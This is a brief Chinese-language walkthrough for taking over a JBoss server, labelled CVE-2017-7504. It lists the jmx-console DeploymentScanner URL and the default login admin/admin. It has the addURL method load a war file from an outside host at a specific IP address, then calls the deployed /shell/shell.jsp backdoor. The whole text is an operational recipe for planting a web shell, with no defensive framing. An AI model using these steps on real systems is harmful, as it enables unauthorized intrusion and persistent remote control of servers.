Jboss CVE-2017-7504
访问ip/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL
登陆
弱口令:admin/admin
生成war包部署自己服务器上:http://47.243.68.160/war.war
找到void addURL(),在ParamValue填入我们远程的war包,点击invoke
提示成功后,访问/shell/shell.jsp触发后门
访问/shell/shell.jsp 200界面证明上传成功